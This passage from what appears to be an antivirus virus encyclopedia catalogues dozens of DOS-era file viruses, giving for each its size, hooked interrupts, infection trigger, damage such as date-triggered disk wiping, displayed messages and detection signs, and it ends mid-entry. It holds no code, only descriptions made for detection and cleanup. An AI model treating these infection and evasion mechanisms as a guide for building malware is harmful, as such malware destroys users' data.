  14020.  
  14021. [In83-584]
  14022. Virus Name: In83-584
  14023. Virus Type: File Virus (COM files)
  14024. Virus Length: 584 bytes
  14025.  
  14026. PC Vectors Hooked: INT 21h, INT 24h
  14027.  
  14028. Execution Procedure:
  14029. 1) Checks whether it is memory resident. If not, it loads itself
  14030.    resident in the high memory.
  14031. 2) Hooks INT 21h and goes back to the original routine.
  14032.  
  14033. Infection Procedure:
  14034. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14035.    prevent divulging its trace when writing. If the program to be
  14036.    executed is an uninfected COM file, the virus proceeds to infect it.
  14037.  
  14038. Damage: None
  14039.  
  14040. Detection method: Infected files increase by 584 bytes.
  14041.  
  14042. [Tankard]
  14043. Virus Name: Tankard
  14044. Virus Type: File Virus (COM files)
  14045. Virus Length: 493 bytes
  14046.  
  14047. PC Vectors Hooked: INT 21h, INT 24h
  14048.  
  14049. Execution Procedure:
  14050. 1) Checks whether it is memory resident. If not, it loads itself
  14051.    resident in the high memory.
  14052. 2) Hooks INT 21h and goes back to the original routine.
  14053.  
  14054. Infection Procedure:
  14055. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  14056.    prevent divulging its trace when writing. If the program to be
  14057.    executed is an uninfected COM file, the virus proceeds to infect it.
  14058.  
  14059. Damage: None
  14060.  
  14061. Detection method: Infected files increase by 493 bytes.
  14062.  
  14063. [1241]
  14064. Virus Name: 1241
  14065. Virus Type: File Virus (COM and EXE files)
  14066. Virus Length: 1560-1570 bytes
  14067.  
  14068. PC Vectors Hooked: INT 21h
  14069.  
  14070. Execution Procedure:
  14071. The virus checks whether the current calendar date is later than
  14072. November 13, 1990. If it is, the virus displays the following message:
  14073.  
  14074.     "St Cruz, Dili, 1991 Nov 12.
  14075.     Lusitania Expresso,
  14076.     Freedom for East Timor !"
  14077.  
  14078. Then reboots the system. Otherwise, it will check whether it is memory
  14079. resident. If not, it loads itself resident in the high memory. Then
  14080. hooks INT 21h and goes back to the original routine.
  14081.  
  14082. Infection Procedure:
  14083. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14084.    executed is an uninfected COM or EXE file, the virus proceeds to
  14085.    infect it.
  14086.  
  14087. Damage: None
  14088.  
  14089. Detection method: Infected files increase by 1560-1570 bytes.
  14090.  
  14091. [104]
  14092. Virus Name: 104
  14093. Virus Type: File Virus (COM files)
  14094. Virus Length: 400 bytes
  14095.  
  14096. PC Vectors Hooked: INT 21h
  14097.  
  14098. Execution Procedure:
  14099. 1) Checks whether it is memory resident. If not, it loads itself
  14100.    resident in the high memory.
  14101. 2) Hooks INT 21h and goes back to the original routine.
  14102.  
  14103. Infection Procedure:
  14104. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  14105.    is an uninfected COM file, the virus proceeds to infect it.
  14106.  
  14107. Damage: None
  14108.  
  14109. Note: An error message appears when writing because INT 24h has not
  14110. been hanged.
  14111.  
  14112. Detection method: Infected files increase by 400 bytes.
  14113.  
  14114. [Trident]
  14115. Virus Name: Trident
  14116. Virus Type: File Virus (COM and EXE files)
  14117. Virus Length: 2385-2395 bytes
  14118.  
  14119. PC Vectors Hooked: INT 21h, INT 24h
  14120.  
  14121. Execution Procedure:
  14122. 1) Checks whether it is memory resident. If not, it loads itself
  14123.    resident in the high memory.
  14124. 2) Hooks INT 21h and goes back to the original routine.
  14125.  
  14126. Infection Procedure:
  14127. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14128.    prevent divulging its trace when writing.
  14129. 2) Checks whether the DIR command is used (e.g., DIR H*.*). If so, all
  14130.    uninfected COM and EXE files accessed by this command get infected.
  14131.  
  14132. Damage: None
  14133.  
  14134. Detection method: Infected files increase by 2385-2395 bytes.
  14135.  
  14136. [Explode]
  14137. Virus Name: Explode
  14138. Virus Type: File Virus (COM files)
  14139. Virus Length:
  14140.  
  14141. Execution Procedure:
  14142. 1) Searches for all uninfected COM files on the current directory,
  14143.    then proceeds to infect them.
  14144. 2) Checks whether the current month is April or May. If it is, the
  14145.    virus displays the following message:
  14146.  
  14147.      "Your hard drive is about to explode !"
  14148.  
  14149.    The virus then destroys all data on the hard disk. If the calendar
  14150.    shows months other than April and May, the virus displays:
  14151.  
  14152.      "Program too big to fit in memory."
  14153.  
  14154. Damage:
  14155. 1) It sometimes destroys all data on the hard disk.
  14156. 2) It overwrites the original files with the virus code, thus
  14157.    corrupting the files.
  14158.  
  14159. Note:
  14160. 1) It does not stay resident in the memory.
  14161. 2) An error message appears when writing because INT 24h has not been
  14162.    hanged.
  14163.  
  14164. [End-Of]
  14165. Virus Name: End-Of
  14166. Virus Type: File Virus (COM files)
  14167. Virus Length: 783 bytes
  14168.  
  14169. PC Vectors Hooked: INT 21h
  14170.  
  14171. Execution Procedure:
  14172. 1) Checks whether it is memory resident. If not, it loads itself
  14173.    resident in the high memory.
  14174. 2) Hooks INT 21h and goes back to the original routine.
  14175.  
  14176. Infection Procedure:
  14177. 1) Hooks INT 21H(AH=3Bh) to infect files. When accessing other
  14178.    directories, all uninfected COM files on the original directory
  14179.    will be infected.
  14180.  
  14181. Damage: None
  14182.  
  14183. Note: An error message appears when writing because INT 24h has not
  14184. been hanged.
  14185.  
  14186. Detection method: Infected files increase by 783 bytes.
  14187.  
  14188. [Copyr-Ug]
  14189. Virus Name: Copyr-Ug
  14190. Virus Type: File Virus (COM and EXE files)
  14191. Virus Length: 766 bytes
  14192.  
  14193. PC Vectors Hooked: INT 21h
  14194.  
  14195. Execution Procedure:
  14196. 1) Checks whether it is memory resident. If not, it loads itself
  14197.    resident in the high memory.
  14198. 2) Hooks INT 21h and goes back to the original routine.
  14199.  
  14200. Infection Procedure:
  14201. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14202.    executed is an uninfected COM or EXE file, the virus proceeds to
  14203.    infect it.
  14204.  
  14205. Damage: None
  14206.  
  14207. Note: An error message appears when writing because INT 24h has not
  14208. been hanged.
  14209.  
  14210. Detection method: Infected files increase by 766 bytes.
  14211.  
  14212. [Chuang]
  14213. Virus Name: Chuang
  14214. Virus Type: File Virus (COM and EXE files)
  14215. Virus Length:  970 bytes
  14216.  
  14217. Execution Procedure:
  14218. 1) Searches for an uninfected COM file on the current directory,
  14219.    then infects it (It only infects one file at a time).
  14220. 2) Checks whether the current calendar day is later than 12, and
  14221.    current time is 22:00 or later. If these conditions are met,
  14222.    the virus destroys all data on the hard disk.
  14223.  
  14224. Damage:  The virus sometimes destroys all data on the hard disk.
  14225.  
  14226. Note:
  14227. 1) It does not stay resident in the memory.
  14228. 2) An error message appears when writing because INT 24h has not been
  14229.    hanged.
  14230.  
  14231. Detection method: Infected files increase by 970 bytes.
  14232.  
  14233. [Ancient]
  14234. Virus Name: Ancient
  14235. Virus Type: File Virus (COM files)
  14236. Virus Length:  783 bytes
  14237.  
  14238. Execution Procedure:
  14239. 1) Searches for an uninfected COM file on the current directory,
  14240.    then infects it (It only infects one file at a time).
  14241. 2) Cleans the screen or displays various colors of ' * ' until a
  14242.    key is depressed. At that time, a strange sound will emit for
  14243.    approximately 5 minutes. After which, the virus will return to the
  14244.    original program.
  14245.  
  14246. Damage: None
  14247.  
  14248. Note:
  14249. 1) It does not stay resident in the memory.
  14250. 2) An error message appears when writing because INT 24h has not been
  14251.    hanged.
  14252. 3) Reinfects files.
  14253.  
  14254. Detection method: Infected files increase by 783 bytes.
  14255.  
  14256. [Adolf_Hitler]
  14257. Virus Name: Adolf_Hitler
  14258. Virus Type: File Virus (COM files)
  14259. Virus Length: 475 bytes
  14260.  
  14261. PC Vectors Hooked: INT 21h, INT 24h
  14262.  
  14263. Execution Procedure:
  14264. 1) Checks whether it is memory resident. If not, it loads itself
  14265.    resident in the high memory.
  14266. 2) Hooks INT 21h and goes back to the original routine.
  14267.  
  14268. Infection Procedure:
  14269. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14270.    prevent divulging its trace when writing. If the program to be
  14271.    executed is an uninfected COM file, the virus proceeds to infect it.
  14272.  
  14273. Damage: None
  14274.  
  14275. Detection method: Infected files increase by 475 bytes.
  14276.  
  14277. [Fob]
  14278. Virus Name: Fob
  14279. Virus Type: File Virus (COM files)
  14280. Virus Length:  1750-1950 bytes
  14281.  
  14282. Execution Procedure:
  14283. 1) Searches for an uninfected COM file on the current directory,
  14284.    then infects it (only infects one file at a time). There is a
  14285.    50% chance that the virus will display a message asking the user
  14286.    to input the following word: "SLOVAKIA."  The virus will wait
  14287.    until the user inputs this word and will proceed to terminate the
  14288.    program.
  14289.  
  14290. Damage: None
  14291.  
  14292. Note:
  14293. 1) It does not stay resident in the memory.
  14294. 2) An error message appears when writing because INT 24h has not been
  14295.    hanged.
  14296.  
  14297. Detection method: Infected files will ask user to input the word
  14298. "SLOVAKIA," and will not end until the user has done so.
  14299.  
  14300. [Signs]
  14301. Virus Name: Signs
  14302. Virus Type: File Virus (COM files)
  14303. Virus Length:  720 bytes
  14304.  
  14305. PC Vectors Hooked: INT 21h, INT 24h
  14306.  
  14307. Execution Procedure:
  14308. 1) Checks whether it is memory resident. If not, it loads itself
  14309.    resident in the high memory.
  14310. 2) Hooks INT 21h and goes back to the original routine.
  14311. 3) Checks whether the current calendar day is Friday. If it is, the
  14312.    screen will roll up once a minute.
  14313.  
  14314. Infection Procedure:
  14315. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14316.    prevent divulging its trace when writing. If the program to be
  14317.    executed is an uninfected COM file, the virus proceeds to infect it.
  14318.  
  14319. Damage: None
  14320.  
  14321. Detection method: Infected files increase by 720 bytes.
  14322.  
  14323. [Shield]
  14324. Virus Name: Shield
  14325. Virus Type: File Virus (COM files)
  14326. Virus Length:  172 bytes
  14327.  
  14328. PC Vectors Hooked: INT 21h
  14329.  
  14330. Execution Procedure:
  14331. 1) Checks whether it is memory resident. If not, it loads itself
  14332.    resident in the high memory.
  14333. 2) Hooks INT 21h and goes back to the original routine.
  14334.  
  14335. Infection Procedure:
  14336. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  14337.    is an uninfected COM file, the virus proceeds to infect it.
  14338.  
  14339. Damage: None
  14340.  
  14341. Note:
  14342. 1) An error message appears when writing because INT 24h has not been
  14343.    hanged.
  14344. 2) The function of the infected program is different from the
  14345.    original. Infected files have no ability to infect other
  14346.    files. But they can display a message when the current month is
  14347.    February. The message reads:
  14348.  
  14349.    "I greet you user .
  14350.     I am COM-CHILD, son of The Breeder Virus.
  14351.     Look out for the RENAME-PROBLEM !"
  14352.  
  14353. Detection method: Infected files increase by 172 bytes.
  14354.  
  14355. [Wishes]
  14356. Virus Name: Wishes
  14357. Virus Type: File Virus (COM and EXE files)
  14358. Virus Length:  970 bytes
  14359.  
  14360. PC Vectors Hooked: INT 21h, INT 24h
  14361.  
  14362. Execution Procedure:
  14363. 1) Checks whether it is memory resident. If not, it loads itself
  14364.    resident in the high memory.
  14365. 2) Hooks INT 21h and goes back to the original routine.
  14366. 3) Checks whether the current calendar day is 13, Friday. If it is,
  14367.    the virus proceeds to destroy all data on the hard disk.
  14368.  
  14369. Infection Procedure:
  14370. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  14371.    prevent divulging its trace when writing. If the program to be
  14372.    executed is an uninfected COM or EXE file, the virus proceeds to
  14373.    infect it.
  14374.  
  14375. Damage:  The virus sometimes destroys all data on the hard disk.
  14376.  
  14377. Detection method: Infected files increase by 970 bytes.
  14378.  
  14379. [439]
  14380. Virus Name: 439
  14381. Virus Type: File Virus (COM files)
  14382. Virus Length:  439 bytes
  14383.  
  14384. PC Vectors Hooked: INT 21h, INT 24h
  14385.  
  14386. Execution Procedure:
  14387. 1) Checks whether it is memory resident. If not, it loads itself
  14388.    resident in the high memory.
  14389. 2) Hooks INT 21h and goes back to the original routine.
  14390.  
  14391. Infection Procedure:
  14392. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14393.    prevent divulging its trace when writing. If the program to be
  14394.    executed is an uninfected COM file, the virus proceeds to infect it.
  14395.  
  14396. Damage: None
  14397.  
  14398. Detection method: Infected files increase by 439 bytes.
  14399.  
  14400. [4-A]
  14401. Virus Name: 4-A
  14402. Virus Type: File Virus (COM files)
  14403. Virus Length:  450-460 bytes
  14404.  
  14405. Execution Procedure:
  14406. The virus displays the following message:
  14407.  
  14408.     "-----Hello  , I am virus ! -----".
  14409.  
  14410. The virus then searches for an uninfected COM file on the current
  14411. directory and infects it (It only infects one file at a time).
  14412.  
  14413. Damage: None
  14414.  
  14415. Note:
  14416. 1) It does not stay resident in the memory.
  14417. 2) An error message appears when writing because INT 24h has not been
  14418.    hanged.
  14419.  
  14420. Detection method:
  14421. 1) Infected files display above message when executed.
  14422. 2) Infected files increase by 450-460 bytes.
  14423.  
  14424. [330]
  14425. Virus Name: 330
  14426. Virus Type: File Virus (COM files)
  14427. Virus Length:  330 bytes
  14428.  
  14429. Execution Procedure:
  14430. 1) Searches for an uninfected COM file on the current directory
  14431.    and infects it (It only infects one file at a time).
  14432. 2) Checks whether the current month is July. If it is, the  virus
  14433.    displays the following message:
  14434.  
  14435.     "[330] by ICE-9."
  14436.  
  14437. Damage: None
  14438.  
  14439. Note:
  14440. 1) It does not stay resident in the memory.
  14441. 2) An error message appears when writing because INT 24h has not been
  14442.    hanged.
  14443.  
  14444. Detection method: Infected files increase by 330 bytes.
  14445.  
  14446. [203]
  14447. Virus Name: 203
  14448. Virus Type: File Virus (COM files)
  14449. Virus Length:  203 bytes
  14450.  
  14451. Execution Procedure:
  14452. The virus searches for an uninfected COM file on the current directory,
  14453. then infects it (It only infects one file at a time).
  14454.  
  14455. Damage: None
  14456.  
  14457. Note:
  14458. 1) It does not stay resident in the memory.
  14459. 2) An error message appears when writing because INT 24h has not been
  14460.    hanged.
  14461.  
  14462. Detection method: Infected files increase by 203 bytes.
  14463.  
  14464. [Mr-Vir]
  14465. Virus Name: Mr-Vir
  14466. Virus Type: File Virus (COM files)
  14467. Virus Length:  508 bytes
  14468.  
  14469. Execution Procedure:
  14470. The virus searches for an uninfected COM file on the current directory,
  14471. then infects it (It only infects one file at a time).
  14472.  
  14473. Damage: None
  14474.  
  14475. Note:
  14476. 1) It does not stay resident in the memory.
  14477. 2) An error message appears when writing because INT 24h has not been
  14478.    hanged.
  14479.  
  14480. Detection method: Infected files increase by 508 bytes.
  14481.  
  14482. [Nazgul]
  14483. Virus Name: Nazgul
  14484. Virus Type: File Virus (COM files)
  14485. Virus Length:  266 bytes
  14486.  
  14487. Execution Procedure:
  14488. Virus searches for all uninfected COM files on the current directory,
  14489. then infects them.
  14490.  
  14491. Damage: None
  14492.  
  14493. Note:
  14494. 1) It does not stay resident in the memory.
  14495. 2) An error message appears when writing because INT 24h has not been
  14496.    hanged.
  14497.  
  14498. Detection method: Infected files increase by 266 bytes.
  14499.  
  14500. [Napc]
  14501. Virus Name: Napc
  14502. Virus Type: File Virus (COM and EXE files)
  14503. Virus Length:  729 bytes
  14504.  
  14505. Execution Procedure:
  14506. Virus searches for all uninfected COM and EXE files on the current
  14507. directory, then proceeds to infect them.
  14508.  
  14509. Damage: None
  14510.  
  14511. Note:
  14512. 1) It does not stay resident in the memory.
  14513. 2) An error message appears when writing because INT 24h has not been
  14514.    hanged.
  14515.  
  14516. Detection method: Infected files increase by 729 bytes.
  14517.  
  14518. [Little]
  14519. Virus Name: Little
  14520. Virus Type: File Virus (COM files)
  14521. Virus Length:  665 bytes
  14522.  
  14523. Execution Procedure:
  14524. Virus searches for an uninfected COM file on the current directory,
  14525. then infects it (It only infects one file at a time).
  14526.  
  14527. Damage: None
  14528.  
  14529. Note:
  14530. 1) It does not stay resident in the memory.
  14531. 2) An error message appears when writing because INT 24h has not been
  14532.    hanged.
  14533.  
  14534. Detection method: Infected files increase by 665 bytes.
  14535.  
  14536. [Atte-629]
  14537. Virus Name: Atte-629
  14538. Virus Type: File Virus (COM files)
  14539. Virus Length:  629 bytes
  14540.  
  14541. Execution Procedure:
  14542. Virus searches for an uninfected COM file on the current directory,
  14543. then infects it (It only infects one file at a time).
  14544.  
  14545. Damage: None
  14546.  
  14547. Note:
  14548. 1) It does not stay resident in the memory.
  14549. 2) An error message appears when writing because INT 24h has not been
  14550.    hanged.
  14551.  
  14552. Detection method: Infected files increase by 629 bytes.
  14553.  
  14554. [A&A]
  14555. Virus Name: A&A
  14556. Virus Type: File Virus (COM files)
  14557. Virus Length:  506 bytes
  14558.  
  14559. PC Vectors Hooked: INT 21h, INT 24h
  14560.  
  14561. Execution Procedure:
  14562. 1) Checks whether it is memory resident. If not, it loads itself
  14563.    resident in the high memory.
  14564. 2) Hooks INT 21h and goes back to the original routine.
  14565.  
  14566. Infection Procedure:
  14567. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14568.    prevent divulging its trace when writing. If the program to be
  14569.    executed is an uninfected COM file, the virus proceeds to infect it.
  14570.  
  14571. Damage: None
  14572.  
  14573. Detection method: Infected files increase by 506 bytes.
  14574.  
  14575. [Magnitogorski-3]
  14576. Virus Name: Magnitogorski-3
  14577. Virus Type: File Virus (COM and EXE files)
  14578. Virus Length:  3000 bytes
  14579.  
  14580. PC Vectors Hooked: INT 21h, INT 24h
  14581.  
  14582. Execution Procedure:
  14583. 1) Checks whether it is memory resident. If not, it loads itself
  14584.    resident in the high memory.
  14585. 2) Hooks INT 21h and goes back to the original routine.
  14586.  
  14587. Infection Procedure:
  14588. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14589.    prevent divulging its trace when writing. If the program to be
  14590.    executed is an uninfected COM or EXE file, the virus proceeds to
  14591.    infect it.
  14592.  
  14593. Damage: None
  14594.  
  14595. Detection method: Infected files increase by 3000 bytes.
  14596.  
  14597. [Lpt-Off]
  14598. Virus Name: Lpt-Off
  14599. Virus Type: File Virus (COM files)
  14600. Virus Length:  256 bytes
  14601.  
  14602. PC Vectors Hooked: INT 21h
  14603.  
  14604. Execution Procedure:
  14605. 1) Checks whether it is memory resident. If not, it loads itself
  14606.    resident in the high memory.
  14607. 2) Hooks INT 21h and goes back to the original routine.
  14608.  
  14609. Infection Procedure:
  14610. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14611.    executed is an uninfected COM file, the virus proceeds to infect it.
  14612.  
  14613. Damage: None
  14614.  
  14615. Note: An error message appears when writing because INT 24h has not
  14616. been hanged.
  14617.  
  14618. Detection method: Infected files increase by 256 bytes.
  14619.  
  14620. [Kiwi-550]
  14621. Virus Name: Kiwi-550
  14622. Virus Type: File Virus (EXE files)
  14623. Virus Length:  550-570 bytes
  14624.  
  14625. PC vectors Hooked: INT 21h, INT 24h
  14626.  
  14627. Execution Procedure:
  14628. 1) Checks whether it is memory resident. If not, it loads itself
  14629.    resident in the high memory.
  14630. 2) Hooks INT 21h and goes back to the original routine.
  14631.  
  14632. Infection Procedure:
  14633. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14634.    prevent divulging its trace when writing. If the program to be
  14635.    executed is an uninfected EXE file, the virus proceeds to infect it.
  14636.  
  14637. Damage: None
  14638.  
  14639. Detection method: Infected files increase by 550-570 bytes.
  14640.  
  14641. [Dennis-2]
  14642. Virus Name: Dennis-2
  14643. Virus Type: File Virus (COM and EXE files)
  14644. Virus Length:  897 bytes
  14645.  
  14646. PC Vectors Hooked: INT 21h
  14647.  
  14648. Execution Procedure:
  14649. 1) Checks whether it is memory resident. If not, it loads itself
  14650.    resident in the high memory.
  14651. 2) Hooks INT 21h and goes back to the original routine.
  14652.  
  14653. Infection Procedure:
  14654. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14655.    executed is an uninfected COM or EXE file, the virus proceeds to
  14656.    infect it.
  14657.  
  14658. Damage: None
  14659.  
  14660. Detection method: Infected files increase by 897 bytes.
  14661.  
  14662. [Beer]
  14663. Virus Name: Beer
  14664. Virus Type: File Virus
  14665. Virus Length:
  14666.  
  14667. PC Vectors Hooked: INT 21h, INT 24h
  14668.  
  14669. Execution Procedure:
  14670. 1) Checks whether it is memory resident. If not, it loads itself
  14671.    resident in the high memory.
  14672. 2) Hooks INT 21h and goes back to the original routine.
  14673.  
  14674. Infection Procedure:
  14675. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14676.    prevent divulging its trace when writing. If the program to be
  14677.    executed is an uninfected file, the virus proceeds to infect it.
  14678.  
  14679. Damage: None
  14680.  
  14681. Note: This virus has at least three variations.
  14682.  
  14683. [2560]
  14684. Virus Name: 2560
  14685. Virus Type: File Virus (COM and EXE files)
  14686. Virus Length:  2560 bytes
  14687.  
  14688. PC vectors hooked: INT 21h, INT 24h
  14689.  
  14690. Execution Procedure:
  14691. 1) Checks whether it is memory resident. If not, it loads itself
  14692.    resident in the high memory.
  14693. 2) Hooks INT 21h and goes back to the original routine.
  14694.  
  14695. Infection Procedure:
  14696. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14697.    prevent divulging its trace when writing. If the program to be
  14698.    executed is an uninfected COM or EXE file, the virus proceeds to
  14699.    infect it.
  14700.  
  14701. Damage: None
  14702.  
  14703. Detection method: Infected files increase by 2560 bytes.
  14704.  
  14705. [Atas-3321]
  14706. Virus Name: Atas-3321
  14707. Virus Type: File Virus (COM files)
  14708. Virus Length:  3321 bytes
  14709.  
  14710. PC Vectors Hooked: INT 21h, INT 24h
  14711.  
  14712. Execution Procedure:
  14713. 1) Checks whether it is memory resident. If not, it loads itself
  14714.    resident in the high memory.
  14715. 2) Hooks INT 21h and goes back to the original routine.
  14716.  
  14717. The virus can only execute its program on DOS 3.3.
  14718.  
  14719. Infection Procedure:
  14720. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14721.    prevent divulging its trace when writing. If the program to be
  14722.    executed is an uninfected COM file, the virus proceeds to infect it.
  14723.  
  14724. Damage: None
  14725.  
  14726. Detection method: Infected files increase by 3321 bytes.
  14727.  
  14728. [Ecu]
  14729. Virus Name: Ecu
  14730. Virus Type: File Virus (EXE files)
  14731. Virus Length:  711 bytes
  14732.  
  14733. PC Vectors Hooked: INT 21h, INT 24h
  14734.  
  14735. Execution Procedure:
  14736. 1) Checks whether it is memory resident. If not, it loads itself
  14737.    resident in the high memory.
  14738. 2) Hooks INT 21h and goes back to the original routine.
  14739.  
  14740. The virus can only execute its program on DOS 3.3.
  14741.  
  14742. Infection Procedure:
  14743. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14744.    prevent divulging its trace when writing. If the program to be
  14745.    executed is an uninfected EXE file, the virus proceeds to infect it.
  14746.  
  14747. Damage: Most infected files cannot execute.
  14748.  
  14749. Detection method: Infected files increase by 711 bytes.
  14750.  
  14751. [N1]
  14752. Virus Name: N1
  14753. Virus Type: File Virus (COM files)
  14754. Virus Length: 10,230-10,240 bytes
  14755.  
  14756. Execution Procedure:
  14757. The virus searches for an uninfected COM file on the current directory,
  14758. then infects it (only infects one file at a time). The virus then
  14759. displays the following message:
  14760.  
  14761. "This File Has Been Infected By NUMBER One!"
  14762.  
  14763. Damage: None
  14764.  
  14765. Note:
  14766. 1) It does not stay resident in the memory.
  14767. 2) An error message appears when writing because INT 24h has not been
  14768.    hanged.
  14769.  
  14770. Detection method: Infected files will display the above message when
  14771. executed.
  14772.  
  14773. [Arcv-718]
  14774. Virus Name: Arcv-718
  14775. Virus Type: File Virus (COM and EXE files)
  14776. Virus Length:  718 bytes
  14777.  
  14778. PC Vectors Hooked: INT 21h
  14779.  
  14780. Execution Procedure:
  14781. 1) Checks whether it is memory resident. If not, it loads itself
  14782.    resident in the high memory.
  14783. 2) Hooks INT 21h and goes back to the original routine.
  14784. 3) Checks whether the current date is between 1 and 7, January.
  14785.    If it is, the virus displays the following message and proceeds to
  14786.    hang the system:
  14787.  
  14788.      "Hello Dr Sol & Fido Lurve U lots...    "
  14789.  
  14790. Infection Procedure:
  14791. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  14792.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  14793.  
  14794. Damage: Virus will sometimes halt the system.
  14795.  
  14796. Detection method: Infected files increase by 718 bytes.
  14797.  
  14798. [L-933]
  14799. Virus Name: L-933
  14800. Virus Type: File Virus (COM files)
  14801. Virus Length:  933-950 bytes
  14802.  
  14803. Execution Procedure:
  14804. 1) Searches for an uninfected COM file on the current directory,
  14805.    then infects it (only infects one file at a time).
  14806. 2) Checks the current date.
  14807.    i)  If it is March 8, the virus destroys all data on the hard disk.
  14808.    ii) If it is September 1, the virus deletes itself.
  14809.  
  14810. Damage:  Virus will sometimes destroy all data on the hard disk.
  14811.  
  14812. Note:
  14813. 1) It does not stay resident in the memory.
  14814. 2) An error message appears when writing because INT 24h has not been
  14815.    hanged.
  14816.  
  14817. Detection method: Infected files increase by 933-950 bytes.
  14818.  
  14819. [Alpha743]
  14820. Virus Name: Alpha743
  14821. Virus Type: File Virus (COM files)
  14822. Virus Length:  743 bytes
  14823.  
  14824. Execution Procedure:
  14825. 1) Searches for an uninfected COM file on the current directory,
  14826.    then infects it (only infects one file at a time).
  14827. 2) Checks whether the current year is 1993 or later. If current month
  14828.    is later than February, and current day is 5, the virus displays the
  14829.    following message:
  14830.  
  14831.         "Your PC has ALPHA virus.
  14832.          Brought to you by the ARCV
  14833.          Made in ENGLAND"
  14834.  
  14835. Damage: None
  14836.  
  14837. Note:
  14838. 1) It does not stay resident in the memory.
  14839. 2) An error message appears when writing because INT 24h has not been
  14840.    hanged.
  14841.  
  14842. Detection method: Infected files increase by 743 bytes.
  14843.  
  14844. [Clint]
  14845. Virus Name: Clint
  14846. Virus Type: File Virus (COM and EXE files)
  14847. Virus Length:
  14848.  
  14849. Execution Procedure:
  14850. 1) Searches for an uninfected COM or EXE file on the current directory,
  14851.    then infects it (infects four files at a time).
  14852. 2) Displays the following message:
  14853.  
  14854.    "memory allocation error !"
  14855.  
  14856. Damage: It overwrites the original files with the virus code, thus
  14857. corrupting the files.
  14858.  
  14859. Note:
  14860. 1) It does not stay resident in the memory.
  14861. 2) An error message appears when writing because INT 24h has not been
  14862.    hanged.
  14863.  
  14864. Detection method: Infected files display the above message when
  14865. executed.
  14866.  
  14867. [Love-Child-2710]
  14868. Virus Name: Love-Child-2710
  14869. Virus Type: File Virus (COM files)
  14870. Virus Length:  2710 bytes
  14871.  
  14872. PC Vectors Hooked: INT 13h, INT 24h
  14873.  
  14874. Execution Procedure:
  14875. 1) Checks whether the current date is one of the following dates:
  14876.    November 5, February 22, June 23, August 24, or October 6, or
  14877.    that the system is not DOS 3.3. If these conditions are met, the
  14878.    virus destroys the Partition and parts of FAT. If conditions are not
  14879.    met, the virus checks whether it is memory resident. If not, it
  14880.    loads itself resident in the high memory.
  14881. 2) Hooks INT 13h and goes back to original routine.
  14882.  
  14883. Infection Procedure:
  14884. 1) Hooks INT 13H to infect files. First, it hangs INT 24h to prevent
  14885.    divulging its trace when writing. If the program to be executed is
  14886.    an uninfected COM file, the virus proceeds to infect it.
  14887.  
  14888. Damage: Virus sometimes destroys the Partition and parts of FAT.
  14889.  
  14890. Detection method: Infected files increase by 2710 bytes.
  14891.  
  14892. [Basedrop]
  14893. Virus Name: Basedrop
  14894. Virus Type: File Virus (EXE files)
  14895. Virus Length:
  14896.  
  14897. Execution Procedure:
  14898. 1) There is a 25% chance that the virus will do the following:
  14899.    Search for an uninfected EXE file on the current directory, then
  14900.    infect it (only infects one file at a time).
  14901. 2) There is a 25% chance that the virus will do the following:
  14902.    Carry-out the above procedure. Then, display a message asking the
  14903.    user to input the following word: "SLOVAKIA." The virus
  14904.    will wait until the user inputs this word.  Virus will then
  14905.    terminate.
  14906. 3) There is a 50% chance that the virus program will not infect
  14907.    files.
  14908.  
  14909. Damage: None
  14910.  
  14911. [Arianna]
  14912. Virus Name:  ARIANNA
  14913. Virus Type: Multi-partite virus
  14914. 1. High memory resident file infector. The ARIANNA virus will
  14915.    only infect .EXE files which are shorter than 70000H bytes in
  14916.    length and bigger than 1770H bytes in length.
  14917. 2. Partition sector infector.  This virus overwrites the last 9
  14918.    sectors of the hard drive.
  14919. Virus Length:  3426 bytes (EXE files), 3586 (memory)
  14920.  
  14921. PC Vectors Hooked:  INT 21h
  14922.  
  14923. Infection Process: This virus is spread by executing an infected
  14924. program or a computer  with a partition that has been infected.
  14925. When a file infected with the ARIANNA virus is executed, it will
  14926. check to see if it is already resident in the memory by checking to
  14927. see if the return value of ax is equal to 0 after int
  14928. 2f(ax=FE01). If the virus is already in the memory it will execute the
  14929. infected program. The virus code remains resident in the high memory.
  14930.  
  14931. Damage:  Decreases available memory. Infected files increase by 3426
  14932. bytes.
  14933.  
  14934. Symptoms: While the ARIANNA virus is resident in memory you
  14935. cannot alter the HD partition to cause any damage to the partition
  14936. sector by cleaning it. The way to clean the ARIANNA virus from
  14937. the system is to boot up the computer with a clean
  14938. system diskette and overwrite the infected partition sector with
  14939. the No.9.
  14940.  
  14941. [Boza]
  14942. Virus Name: Boza
  14943. Alias Name: Bizatch
  14944. Virus Type: File Virus (EXE files)
  14945. Virus Length: 2,680 bytes
  14946.  
  14947. Execution Procedure:
  14948. When an infected file is executed, the virus
  14949. does not install itself into memory.  The virus
  14950. will infect files which are in Microsoft's Win32
  14951. Portable Executable (PE) file format which means
  14952. that the virus will only infect Win95 and Win32S
  14953. executable files.  The virus attempts to infect
  14954. up to three files in the current directory;
  14955. however, due to some bugs in the program it may
  14956. end up corrupting the files it infects.
  14957.  
  14958. When the system date reaches the 31st of any month
  14959. the virus will display the following message:
